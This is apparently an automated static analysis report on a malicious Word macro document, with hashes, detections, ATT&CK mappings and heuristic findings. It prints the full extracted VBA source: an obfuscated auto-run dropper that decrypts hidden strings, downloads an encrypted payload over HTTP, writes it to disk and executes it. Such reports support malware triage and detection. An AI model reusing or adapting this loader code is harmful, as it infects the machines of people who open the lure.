Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 87f4623cb20906b7…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-01
MD5: 8ef4b1693588eb59c8ec076577c0e890 SHA-1: dfa53f7cb5ff5283427a6105a8edac0e56cabd6c SHA-256: 87f4623cb20906b7629447c21039202637e37ff45e1787378af1d208d2f12f42
360 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing obfuscated VBA macros, specifically an auto-exec loader within the Document_Open subroutine. It employs a common lure to trick users into enabling macros, which is a technique used by malware droppers. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but the presence of an auto-exec macro and the 'CreateObject' call strongly suggest it's designed to download and execute a second-stage payload.

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set FoHMKxw = CreateObject(ORS51wP6rV(Chr(148) + Chr(36) + Chr(76) + Chr(63) + Chr(188) + Chr(52) + Chr(125) + Chr(142) + Chr(219) + Chr(47) + Chr(21) + Chr(225) + Chr(107) + Chr(7) + Chr(147) + Chr(211) + Chr(205) + Chr(85) + Chr(51) + Chr(231), "NVUkJ"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set FoHMKxw = CreateObject(ORS51wP6rV(Chr(148) + Chr(36) + Chr(76) + Chr(63) + Chr(188) + Chr(52) + Chr(125) + Chr(142) + Chr(219) + Chr(47) + Chr(21) + Chr(225) + Chr(107) + Chr(7) + Chr(147) + Chr(211) + Chr(205) + Chr(85) + Chr(51) + Chr(231), "NVUkJ"))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName YKid5lbdIiy1, 66, VbMethod, 13, 47, 70
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    MlRUKIdpiA = Environ(ORS51wP6rV(Chr(39) + Chr(234) + Chr(130) + Chr(155) + Chr(192) + Chr(181) + Chr(32), "NlDIhm59z2pZCCH")) & "\" & YgKW1tQoNOQTaQb & ORS51wP6rV(Chr(148) + Chr(100) + Chr(159) + Chr(73), "Geq4b")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12382 bytes
SHA-256: 1e2ba9a979f4b827320b50cce633c1eb6195fb33e572d1aca3827def020c5fb7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
89 of 170 identifiers look randomly generated (e.g. 'NhT5nkkbGZus5FbMJ0lj3XC') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Document_Open()
Dim FrZWyC25gM As Long, WaxNkEjHbpwy As Long
FrZWyC25gM = 15
WaxNkEjHbpwy = 62
If FrZWyC25gM + WaxNkEjHbpwy > 2 Then
WaxNkEjHbpwy = FrZWyC25gM + 73
Else
MsgBox 66
End If
Dim KH8C6FbszRKwU As Long, KBHXrRCsdvxG As Long, LNzrM31rLVhCr As Long
Dim CRpSSIt8VmnTht As Long, GEASPVyXAFFrnc As Long
CRpSSIt8VmnTht = 74
GEASPVyXAFFrnc = 63
If CRpSSIt8VmnTht + GEASPVyXAFFrnc > 2 Then
GEASPVyXAFFrnc = CRpSSIt8VmnTht + 98
Else
MsgBox 66
End If
KH8C6FbszRKwU = 967689266: KBHXrRCsdvxG = 0: LNzrM31rLVhCr = 0
Dim EeKd6EBUSabj As Long, QDIcvJciL As Long
EeKd6EBUSabj = 85
QDIcvJciL = 5
If EeKd6EBUSabj + QDIcvJciL > 2 Then
QDIcvJciL = EeKd6EBUSabj + 94
Else
MsgBox 51
End If
For KBHXrRCsdvxG = 1 To KH8C6FbszRKwU
LNzrM31rLVhCr = LNzrM31rLVhCr + 1
Next KBHXrRCsdvxG
Dim K0hRyUa5WH1FpEo As Long, IAvMZJma As Long
K0hRyUa5WH1FpEo = 92
IAvMZJma = 30
If K0hRyUa5WH1FpEo + IAvMZJma > 2 Then
IAvMZJma = K0hRyUa5WH1FpEo + 45
Else
MsgBox 25
End If
If LNzrM31rLVhCr = KH8C6FbszRKwU Then
Dim I5uBf3Wi9 As Long, TRdNcVq0SxmZ As Long
I5uBf3Wi9 = 66
TRdNcVq0SxmZ = 61
If I5uBf3Wi9 + TRdNcVq0SxmZ > 2 Then
TRdNcVq0SxmZ = I5uBf3Wi9 + 5
Else
MsgBox 47
End If
SPqXbLrWH
Dim KSiIvUNe6 As Long, DoQOAFW92WKty7 As Long
KSiIvUNe6 = 79
DoQOAFW92WKty7 = 68
If KSiIvUNe6 + DoQOAFW92WKty7 > 2 Then
DoQOAFW92WKty7 = KSiIvUNe6 + 4
Else
MsgBox 97
End If
Else
Dim CLynDUUlGzzRsZ As Long, Vqvn32UvW44hKV As Long
CLynDUUlGzzRsZ = 87
Vqvn32UvW44hKV = 97
If CLynDUUlGzzRsZ + Vqvn32UvW44hKV > 2 Then
Vqvn32UvW44hKV = CLynDUUlGzzRsZ + 14
Else
MsgBox 93
End If
GqYRch3iOL7qgYT
Dim KjqWfAbNzBePzPfYG As Long, FiCo2ec5la As Long
KjqWfAbNzBePzPfYG = 3
FiCo2ec5la = 16
If KjqWfAbNzBePzPfYG + FiCo2ec5la > 2 Then
FiCo2ec5la = KjqWfAbNzBePzPfYG + 29
Else
MsgBox 61
End If
End If
Dim TF6dR0s As Long, SMbrJVxv As Long
TF6dR0s = 84
SMbrJVxv = 94
If TF6dR0s + SMbrJVxv > 2 Then
SMbrJVxv = TF6dR0s + 65
Else
MsgBox 52
End If
End Sub
Sub JyuVkQM6i4S5CZ(DUpLaSsm4njm As Long)
Dim RJEbb As Long, PTLNuv7WG As Long
RJEbb = 57
PTLNuv7WG = 25
If RJEbb + PTLNuv7WG > 2 Then
PTLNuv7WG = RJEbb + 46
Else
MsgBox 57
End If
Dim A0HGLd37Qcd As Long
Dim Sbolv As Long, QAsXp5Qkzp1 As Long
Sbolv = 83
QAsXp5Qkzp1 = 73
If Sbolv + QAsXp5Qkzp1 > 2 Then
QAsXp5Qkzp1 = Sbolv + 30
Else
MsgBox 33
End If
A0HGLd37Qcd = Timer + DUpLaSsm4njm
Do While Timer < A0HGLd37Qcd
DoEvents
Loop
Dim NhT5nkkbGZus5FbMJ0lj3XC As Long, ScL9nqDmRurrY As Long
NhT5nkkbGZus5FbMJ0lj3XC = 30
ScL9nqDmRurrY = 6
If NhT5nkkbGZus5FbMJ0lj3XC + ScL9nqDmRurrY > 2 Then
ScL9nqDmRurrY = NhT5nkkbGZus5FbMJ0lj3XC + 6
Else
MsgBox 58
End If
End Sub
Function ORS51wP6rV(ByVal RvXFOJylX As String, ByVal SD7D7j9s7IW As String) As String
Dim OBlOIsW As Long, YyAELT0mml4 As Long
OBlOIsW = 7
YyAELT0mml4 = 27
If OBlOIsW + YyAELT0mml4 > 2 Then
YyAELT0mml4 = OBlOIsW + 67
Else
MsgBox 93
End If
On Error Resume Next
Dim NXakoMRF5 As Long, BI2sQid As Long
NXakoMRF5 = 9
BI2sQid = 24
If NXakoMRF5 + BI2sQid > 2 Then
BI2sQid = NXakoMRF5 + 4
Else
MsgBox 64
End If
Dim LfZp5UEqaa1JsJ(0 To 255) As Integer, XUbDXGOkRLo As Long, NJKdbz3Ze As Long, YookgI9ezSqjYWX As Long, YMWWK17e() As Byte, G6Hj6pIKfev() As Byte, B8AnD2 As Byte
Dim FTDS As Long, PHOEPj As Long
FTDS = 98
PHOEPj = 25
If FTDS + PHOEPj > 2 Then
PHOEPj = FTDS + 73
Else
MsgBox 74
End If
YMWWK17e() = StrConv(SD7D7j9s7IW, vbFromUnicode)
Dim O9ui30gfRio As Long, Do3THS1P6G As Long
O9ui30gfRio = 5
Do3THS1P6G = 61
If O9ui30gfRio + Do3THS1P6G > 2 Then
Do3THS1P6G = O9ui30gfRio + 65
Else
MsgBox 28
End If
For XUbDXGOkRLo = 0 To 255
LfZp5UEqaa1JsJ(XUbDXGOkRLo) = XUbDXGOkRLo
Next XUbDXGOkRLo
XUbDXGOkRLo = 0
NJKdbz3Ze = 0
YookgI9ezSqjYWX = 0
For XUbDXGOkRLo = 0 To 255
NJKdbz3Ze = (NJKdbz3Ze + LfZp5UEqaa1JsJ(XUbDXGOkRLo) + YMWWK17e(XUbDXGOkRLo Mod Len(SD7D7j9s7IW))) Mod 256
B8AnD2 = LfZp5UEqaa1JsJ(XUbDXGOkRLo)
LfZp5UEqaa1JsJ(XUbDXGOkRLo) = LfZp5UEqaa1JsJ(NJKdbz3Ze)
LfZp5UEqaa1JsJ(NJKdbz3Ze) = B8AnD2
Next XUbDXGOkRLo
XUbDXGOkRLo = 0
NJKdbz3Ze = 0
YookgI9ezSqjYWX = 0
G6Hj6pIKfev() = StrConv(RvXFOJylX, vbFromUnicode)
For XUbDXGOkRLo = 0 To Len(RvXFOJylX)
NJKdbz3Ze = (NJKdbz3Ze + 1) Mod 256
YookgI9ezSqjYWX = (YookgI9ezSqjYWX + LfZp5UEqaa1JsJ(NJKdbz3Ze)) Mod 256
B8AnD2 = LfZp5UEqaa1JsJ(NJKdbz3Ze)
LfZp5UEqaa1JsJ(NJKdbz3Ze) = LfZp5UEqaa1JsJ(YookgI9ezSqjYWX)
LfZp5UEqaa1JsJ(YookgI9ezSqjYWX) = B8AnD2
G6Hj6pIKfev(XUbDXGOkRLo) = G6Hj6pIKfev(XUbDXGOkRLo) Xor (LfZp5UEqaa1JsJ((LfZp5UEqaa1JsJ(NJKdbz3Ze) + LfZp5UEqaa1JsJ(YookgI9ezSqjYWX)) Mod 256))
Next XUbDXGOkRLo
Dim OxwcBOt23ZUn As Long, Iabxs As Long
OxwcBOt23ZUn = 90
Iabxs = 38
If OxwcBOt23ZUn + Iabxs > 2 Then
Iabxs = OxwcBOt23ZUn + 94
Else
MsgBox 53
End If
ORS51wP6rV = StrConv(G6Hj6pIKfev, vbUnicode)
Dim QIL6xBZlYPrLaEs5 As Long, XKkWX6W3c8x As Long
QIL6xBZlYPrLaEs5 = 43
XKkWX6W3c8x = 81
If QIL6xBZlYPrLaEs5 + XKkWX6W3c8x > 2 Then
XKkWX6W3c8x = QIL6xBZlYPrLaEs5 + 91
Else
MsgBox 8
End If
End Function
Sub SPqXbLrWH()
Dim O6dnTZkzKkWX6W3c8 As Long, EsHvZMTfbkTalN6 As Long
O6dnTZkzKkWX6W3c8 = 18
EsHvZMTfbkTalN6 = 31
If O6dnTZkzKkWX6W3c8 + EsHvZMTfbkTalN6 > 2 Then
EsHvZMTfbkTalN6 = O6dnTZkzKkWX6W3c8 + 44
Else
MsgBox 3
End If
Dim MlRUKIdpiA As String, FoHMKxw As Object, KzsFdnERe6VF As Integer
Dim LNKujnTWIL6xBZ As Long, XCMIBaeyoSfb As Long
LNKujnTWIL6xBZ = 71
XCMIBaeyoSfb = 21
If LNKujnTWIL6xBZ + XCMIBaeyoSfb > 2 Then
XCMIBaeyoSfb = LNKujnTWIL6xBZ + 21
Else
MsgBox 73
End If
MlRUKIdpiA = Environ(ORS51wP6rV(Chr(39) + Chr(234) + Chr(130) + Chr(155) + Chr(192) + Chr(181) + Chr(32), "NlDIhm59z2pZCCH")) & "\" & YgKW1tQoNOQTaQb & ORS51wP6rV(Chr(148) + Chr(100) + Chr(159) + Chr(73), "Geq4b")
Dim KFkoivwbL8 As Long, UGHHOk As Long
KFkoivwbL8 = 83
UGHHOk = 85
If KFkoivwbL8 + UGHHOk > 2 Then
UGHHOk = KFkoivwbL8 + 27
Else
MsgBox 30
End If
Set FoHMKxw = CreateObject(ORS51wP6rV(Chr(148) + Chr(36) + Chr(76) + Chr(63) + Chr(188) + Chr(52) + Chr(125) + Chr(142) + Chr(219) + Chr(47) + Chr(21) + Chr(225) + Chr(107) + Chr(7) + Chr(147) + Chr(211) + Chr(205) + Chr(85) + Chr(51) + Chr(231), "NVUkJ"))
Dim P9z2pZCCHKqVqz As Long, R21kkqQa As Long
P9z2pZCCHKqVqz = 38
R21kkqQa = 94
If P9z2pZCCHKqVqz + R21kkqQa > 2 Then
R21kkqQa = P9z2pZCCHKqVqz + 53
Else
MsgBox 23
End If
FoHMKxw.Open ORS51wP6rV(Chr(246) + Chr(53) + Chr(14), "Ys7HV65jBBs"), ORS51wP6rV(Chr(170) + Chr(163) + Chr(87) + Chr(230) + Chr(158) + Chr(230) + Chr(143) + Chr(2) + Chr(221) + Chr(52) + Chr(71) + Chr(67) + Chr(93) + Chr(15) + Chr(208) + Chr(153) + Chr(235) + Chr(73) + Chr(145) + Chr(6) + Chr(122) + Chr(13) + Chr(119) + Chr(137) + Chr(197) + Chr(23) + Chr(111), "AifMdSygI"), False
Dim AGGdKvSyxp As Long, FAcqIRGy As Long
AGGdKvSyxp = 16
FAcqIRGy = 4
If AGGdKvSyxp + FAcqIRGy > 2 Then
FAcqIRGy = AGGdKvSyxp + 39
Else
MsgBox 7
End If
FoHMKxw.setRequestHeader ORS51wP6rV(Chr(30) + Chr(179) + Chr(179) + Chr(87) + Chr(49) + Chr(142) + Chr(115) + Chr(75) + Chr(3) + Chr(17), "Eowi5"), ORS51wP6rV(Chr(62) + Chr(75) + Chr(234) + Chr(247) + Chr(233) + Chr(222) + Chr(210) + Chr(111) + Chr(228) + Chr(245) + Chr(29), "CKdXDXKhUvoTh")
FoHMKxw.send
If FoHMKxw.Status = 200 Then
Dim U3ncuto6xno8ItY As Long, QH8Uo75PW5u7wp As Long
U3ncuto6xno8ItY = 55
QH8Uo75PW5u7wp = 31
If U3ncuto6xno8ItY + QH8Uo75PW5u7wp > 2 Then
QH8Uo75PW5u7wp = U3ncuto6xno8ItY + 5
Else
MsgBox 57
End If
KzsFdnERe6VF = FreeFile
Open MlRUKIdpiA For Binary Access Write Lock Write As #KzsFdnERe6VF
Put #KzsFdnERe6VF, , ORS51wP6rV(StrConv(FoHMKxw.ResponseBody, vbUnicode), ORS51wP6rV(Chr(227) + Chr(232) + Chr(222) + Chr(160) + Chr(142) + Chr(134) + Chr(17) + Chr(73) + Chr(119), "BkoivwbL8Vi84KL9a"))
Close #KzsFdnERe6VF
Dim YkRm19REFs8Q As Long, Bi2Kbj As Long
YkRm19REFs8Q = 33
Bi2Kbj = 98
If YkRm19REFs8Q + Bi2Kbj > 2 Then
Bi2Kbj = YkRm19REFs8Q + 3
Else
MsgBox 42
End If
JyuVkQM6i4S5CZ 1
Dim E2ulRhJebHzGDFy As Long, B21kkqQa As Long
E2ulRhJebHzGDFy = 36
B21kkqQa = 64
If E2ulRhJebHzGDFy + B21kkqQa > 2 Then
B21kkqQa = E2ulRhJebHzGDFy + 6
Else
MsgBox 8
End If
CreateObject(ORS51wP6rV(Chr(142) + Chr(46) + Chr(196) + Chr(127) + Chr(10) + Chr(188) + Chr(180) + Chr(30) + Chr(253) + Chr(205) + Chr(72) + Chr(202) + Chr(114), "UzgJ8paY3")).Run """" & MlRUKIdpiA & """"
Dim Gon2cB As Long, XkfOqp As Long
Gon2cB = 29
XkfOqp = 11
If Gon2cB + XkfOqp > 2 Then
XkfOqp = Gon2cB + 38
Else
MsgBox 57
End If
End If
Dim YaYFNmri6 As Long, RpRk0gXmJi2 As Long
YaYFNmri6 = 27
RpRk0gXmJi2 = 42
If YaYFNmri6 + RpRk0gXmJi2 > 2 Then
RpRk0gXmJi2 = YaYFNmri6 + 45
Else
MsgBox 63
End If
Set FoHMKxw = Nothing
Dim MvPOZE As Long, OfRyFR As Long
MvPOZE = 49
OfRyFR = 50
If MvPOZE + OfRyFR > 2 Then
OfRyFR = MvPOZE + 47
Else
MsgBox 56
End If
End Sub
Sub GqYRch3iOL7qgYT()
Dim VHZWZR0kFmQRa As Long, QjVnEw As Long
VHZWZR0kFmQRa = 48
QjVnEw = 67
If VHZWZR0kFmQRa + QjVnEw > 2 Then
QjVnEw = VHZWZR0kFmQRa + 57
Else
MsgBox 14
End If
IsError 38
NJ4vSksom = CVDate(44)
LOF 28
IKqncZ7CvmVMC = Dir("EoF49Uy7hNoyF")
Round 75, 32
Join JXPnMwjHn, 90
Switch 86
Command
FreeFile 52
If IsNumeric(30) = True Then JRY87gXieOkHa = 69
LoadPicture 51, 33, 59, 79, 46
Second 46
LNyJyw9MdkYn = CVErr(21)
NPer 22, 73, 90
Randomize
HlWWP0fhJ = EOF(15)
Hour 68
WeekdayName 7
CallByName YKid5lbdIiy1, 66, VbMethod, 13, 47, 70
RxNzQPznND = Fix(47)
DDB 42, 31, 66, 60
DeleteSetting "OOBsle35rC5pr"
Td4sM1 = Day(4)
Filter TnGEMPeigR, 10
ChDrive 72
DateAdd "VTyjuy0OC", 93, 5
Err.Clear
K1iy = CVar(97)
QZvMSBNOUhHQanj = CurDir
IPmt 20, 52, 54, 95
Dim Uxvt1zST7Ht As Long, HGoap As Long
Uxvt1zST7Ht = 20
HGoap = 56
If Uxvt1zST7Ht + HGoap > 2 Then
HGoap = Uxvt1zST7Ht + 94
Else
MsgBox 32
End If
End Sub
Function YgKW1tQoNOQTaQb() As String
Dim F8mpSgM9 As Long, WdxE As Long
F8mpSgM9 = 40
WdxE = 43
If F8mpSgM9 + WdxE > 2 Then
WdxE = F8mpSgM9 + 61
Else
MsgBox 7
End If
Dim IUjM44uIQaF() As Byte, ThQVLXKkG() As Byte, Du86 As Long, IPiO5ehybH As Long, ObKiFHIBCFN As String, DcDZjTm4lAz As String, On32jt6A4r As Long
Dim KKPhChpEYWT3BY As Long, P9Q5eUjUREB As Long
KKPhChpEYWT3BY = 22
P9Q5eUjUREB = 49
If KKPhChpEYWT3BY + P9Q5eUjUREB > 2 Then
P9Q5eUjUREB = KKPhChpEYWT3BY + 14
Else
MsgBox 47
End If
On32jt6A4r = 0
Dim KEX2xt90CA3gs As Long, FEJu7DeLhwFPtQ6 As Long
KEX2xt90CA3gs = 46
FEJu7DeLhwFPtQ6 = 75
If KEX2xt90CA3gs + FEJu7DeLhwFPtQ6 > 2 Then
FEJu7DeLhwFPtQ6 = KEX2xt90CA3gs + 61
Else
MsgBox 31
End If
F6VrwWGOUAqdzF:
Dim CVTbL As Long, WjoNz5 As Long
CVTbL = 36
WjoNz5 = 8
If CVTbL + WjoNz5 > 2 Then
WjoNz5 = CVTbL + 39
Else
MsgBox 46
End If
Randomize
DcDZjTm4lAz = Int(30 * Rnd)
If DcDZjTm4lAz < 4 Then GoTo F6VrwWGOUAqdzF
On32jt6A4r = DcDZjTm4lAz
If On32jt6A4r > 0& Then
Dim DI6A As Long, EDnK1UFPtQ6 As Long
DI6A = 17
EDnK1UFPtQ6 = 65
If DI6A + EDnK1UFPtQ6 > 2 Then
EDnK1UFPtQ6 = DI6A + 65
Else
MsgBox 18
End If
ObKiFHIBCFN = ORS51wP6rV(Chr(235) + Chr(63) + Chr(47) + Chr(4) + Chr(236) + Chr(138) + Chr(2) + Chr(139) + Chr(208) + Chr(191), "OaG8CeJXcjaM7W")
Randomize
IUjM44uIQaF = ObKiFHIBCFN
Du86 = Len(ObKiFHIBCFN) - 1&
On32jt6A4r = (On32jt6A4r * 2&) - 1&
ReDim ThQVLXKkG(On32jt6A4r) As Byte
Dim M6Hxn As Long, TXjuZcMj8dZyrl As Long
M6Hxn = 72
TXjuZcMj8dZyrl = 98
If M6Hxn + TXjuZcMj8dZyrl > 2 Then
TXjuZcMj8dZyrl = M6Hxn + 19
Else
MsgBox 59
End If
For IPiO5ehybH = 0& To On32jt6A4r Step 2&
ThQVLXKkG(IPiO5ehybH) = IUjM44uIQaF(CLng(Du86 * Rnd) * 2&)
Next
Dim StYz8F9PQ8BFKVC As Long, AJVCCCay58liVfG As Long
StYz8F9PQ8BFKVC = 13
AJVCCCay58liVfG = 37
If StYz8F9PQ8BFKVC + AJVCCCay58liVfG > 2 Then
AJVCCCay58liVfG = StYz8F9PQ8BFKVC + 91
Else
MsgBox 29
End If
End If
Dim KwiHrUo As Long, U8dZyrle8J84k As Long
KwiHrUo = 64
U8dZyrle8J84k = 57
If KwiHrUo + U8dZyrle8J84k > 2 Then
U8dZyrle8J84k = KwiHrUo + 79
Else
MsgBox 12
End If
YgKW1tQoNOQTaQb = ThQVLXKkG
Dim CPNrR0zyQB8yrf As Long, XvIh4eTk As Long
CPNrR0zyQB8yrf = 27
XvIh4eTk = 95
If CPNrR0zyQB8yrf + XvIh4eTk > 2 Then
XvIh4eTk = CPNrR0zyQB8yrf + 16
Else
MsgBox 28
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 950cc217eb7b05094c9c43714480ef7df9bf6cba7c79958a453b48a1cadbebd7
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.